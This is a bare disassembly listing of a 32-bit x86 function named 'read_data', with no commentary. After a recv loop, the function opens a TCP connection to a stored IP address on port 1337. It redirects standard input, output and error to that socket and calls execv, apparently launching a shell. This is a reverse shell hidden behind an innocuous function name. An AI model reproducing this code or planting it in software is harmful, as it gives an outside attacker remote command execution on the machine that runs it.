00001309 <read_data>:
    1309:	55                   	push   ebp
    130a:	89 e5                	mov    ebp,esp
    130c:	53                   	push   ebx
    130d:	83 ec 24             	sub    esp,0x24
    1310:	e8 fb fe ff ff       	call   1210 <__x86.get_pc_thunk.bx>
    1315:	81 c3 eb 2c 00 00    	add    ebx,0x2ceb
    131b:	c7 45 f4 00 00 00 00 	mov    DWORD PTR [ebp-0xc],0x0
    1322:	eb 30                	jmp    1354 <read_data+0x4b>
    1324:	8b 4d f4             	mov    ecx,DWORD PTR [ebp-0xc]
    1327:	8b 45 10             	mov    eax,DWORD PTR [ebp+0x10]
    132a:	29 c8                	sub    eax,ecx
    132c:	89 c2                	mov    edx,eax
    132e:	8b 4d f4             	mov    ecx,DWORD PTR [ebp-0xc]
    1331:	8b 45 0c             	mov    eax,DWORD PTR [ebp+0xc]
    1334:	01 c8                	add    eax,ecx
    1336:	6a 00                	push   0x0
    1338:	52                   	push   edx
    1339:	50                   	push   eax
    133a:	ff 75 08             	push   DWORD PTR [ebp+0x8]
    133d:	e8 5e fe ff ff       	call   11a0 <recv@plt>
    1342:	83 c4 10             	add    esp,0x10
    1345:	89 45 ec             	mov    DWORD PTR [ebp-0x14],eax
    1348:	83 7d ec 00          	cmp    DWORD PTR [ebp-0x14],0x0
    134c:	7e 06                	jle    1354 <read_data+0x4b>
    134e:	8b 45 ec             	mov    eax,DWORD PTR [ebp-0x14]
    1351:	01 45 f4             	add    DWORD PTR [ebp-0xc],eax
    1354:	8b 45 f4             	mov    eax,DWORD PTR [ebp-0xc]
    1357:	39 45 10             	cmp    DWORD PTR [ebp+0x10],eax
    135a:	77 c8                	ja     1324 <read_data+0x1b>
    135c:	83 ec 04             	sub    esp,0x4
    135f:	6a 00                	push   0x0
    1361:	6a 01                	push   0x1
    1363:	6a 02                	push   0x2
    1365:	e8 06 fe ff ff       	call   1170 <socket@plt>
    136a:	83 c4 10             	add    esp,0x10
    136d:	89 45 f0             	mov    DWORD PTR [ebp-0x10],eax
    1370:	c7 45 dc 00 00 00 00 	mov    DWORD PTR [ebp-0x24],0x0
    1377:	c7 45 e0 00 00 00 00 	mov    DWORD PTR [ebp-0x20],0x0
    137e:	c7 45 e4 00 00 00 00 	mov    DWORD PTR [ebp-0x1c],0x0
    1385:	c7 45 e8 00 00 00 00 	mov    DWORD PTR [ebp-0x18],0x0
    138c:	66 c7 45 dc 02 00    	mov    WORD PTR [ebp-0x24],0x2
    1392:	83 ec 0c             	sub    esp,0xc
    1395:	8d 83 08 e0 ff ff    	lea    eax,[ebx-0x1ff8]
    139b:	50                   	push   eax
    139c:	e8 df fd ff ff       	call   1180 <inet_addr@plt>
    13a1:	83 c4 10             	add    esp,0x10
    13a4:	89 45 e0             	mov    DWORD PTR [ebp-0x20],eax
    13a7:	83 ec 0c             	sub    esp,0xc
    13aa:	68 39 05 00 00       	push   0x539
    13af:	e8 cc fc ff ff       	call   1080 <htons@plt>
    13b4:	83 c4 10             	add    esp,0x10
    13b7:	66 89 45 de          	mov    WORD PTR [ebp-0x22],ax
    13bb:	83 ec 04             	sub    esp,0x4
    13be:	6a 10                	push   0x10
    13c0:	8d 45 dc             	lea    eax,[ebp-0x24]
    13c3:	50                   	push   eax
    13c4:	ff 75 f0             	push   DWORD PTR [ebp-0x10]
    13c7:	e8 c4 fd ff ff       	call   1190 <connect@plt>
    13cc:	83 c4 10             	add    esp,0x10
    13cf:	85 c0                	test   eax,eax
    13d1:	74 1c                	je     13ef <read_data+0xe6>
    13d3:	83 ec 0c             	sub    esp,0xc
    13d6:	8d 83 14 e0 ff ff    	lea    eax,[ebx-0x1fec]
    13dc:	50                   	push   eax
    13dd:	e8 ae fc ff ff       	call   1090 <perror@plt>
    13e2:	83 c4 10             	add    esp,0x10
    13e5:	83 ec 0c             	sub    esp,0xc
    13e8:	6a 00                	push   0x0
    13ea:	e8 f1 fc ff ff       	call   10e0 <exit@plt>
    13ef:	83 ec 08             	sub    esp,0x8
    13f2:	6a 00                	push   0x0
    13f4:	ff 75 f0             	push   DWORD PTR [ebp-0x10]
    13f7:	e8 44 fc ff ff       	call   1040 <dup2@plt>
    13fc:	83 c4 10             	add    esp,0x10
    13ff:	83 f8 ff             	cmp    eax,0xffffffff
    1402:	75 1c                	jne    1420 <read_data+0x117>
    1404:	83 ec 0c             	sub    esp,0xc
    1407:	8d 83 38 e0 ff ff    	lea    eax,[ebx-0x1fc8]
    140d:	50                   	push   eax
    140e:	e8 7d fc ff ff       	call   1090 <perror@plt>
    1413:	83 c4 10             	add    esp,0x10
    1416:	83 ec 0c             	sub    esp,0xc
    1419:	6a 00                	push   0x0
    141b:	e8 c0 fc ff ff       	call   10e0 <exit@plt>
    1420:	83 ec 08             	sub    esp,0x8
    1423:	6a 01                	push   0x1
    1425:	ff 75 f0             	push   DWORD PTR [ebp-0x10]
    1428:	e8 13 fc ff ff       	call   1040 <dup2@plt>
    142d:	83 c4 10             	add    esp,0x10
    1430:	83 f8 ff             	cmp    eax,0xffffffff
    1433:	75 1c                	jne    1451 <read_data+0x148>
    1435:	83 ec 0c             	sub    esp,0xc
    1438:	8d 83 5c e0 ff ff    	lea    eax,[ebx-0x1fa4]
    143e:	50                   	push   eax
    143f:	e8 4c fc ff ff       	call   1090 <perror@plt>
    1444:	83 c4 10             	add    esp,0x10
    1447:	83 ec 0c             	sub    esp,0xc
    144a:	6a 00                	push   0x0
    144c:	e8 8f fc ff ff       	call   10e0 <exit@plt>
    1451:	83 ec 08             	sub    esp,0x8
    1454:	6a 02                	push   0x2
    1456:	ff 75 f0             	push   DWORD PTR [ebp-0x10]
    1459:	e8 e2 fb ff ff       	call   1040 <dup2@plt>
    145e:	83 c4 10             	add    esp,0x10
    1461:	83 f8 ff             	cmp    eax,0xffffffff
    1464:	75 1c                	jne    1482 <read_data+0x179>
    1466:	83 ec 0c             	sub    esp,0xc
    1469:	8d 83 84 e0 ff ff    	lea    eax,[ebx-0x1f7c]
    146f:	50                   	push   eax
    1470:	e8 1b fc ff ff       	call   1090 <perror@plt>
    1475:	83 c4 10             	add    esp,0x10
    1478:	83 ec 0c             	sub    esp,0xc
    147b:	6a 00                	push   0x0
    147d:	e8 5e fc ff ff       	call   10e0 <exit@plt>
    1482:	83 ec 08             	sub    esp,0x8
    1485:	6a 00                	push   0x0
    1487:	8d 83 a9 e0 ff ff    	lea    eax,[ebx-0x1f57]
    148d:	50                   	push   eax
    148e:	e8 7d fc ff ff       	call   1110 <execv@plt>
    1493:	83 c4 10             	add    esp,0x10
    1496:	b8 01 00 00 00       	mov    eax,0x1
    149b:	8b 5d fc             	mov    ebx,DWORD PTR [ebp-0x4]
    149e:	c9                   	leave  
    149f:	c3                   	ret    
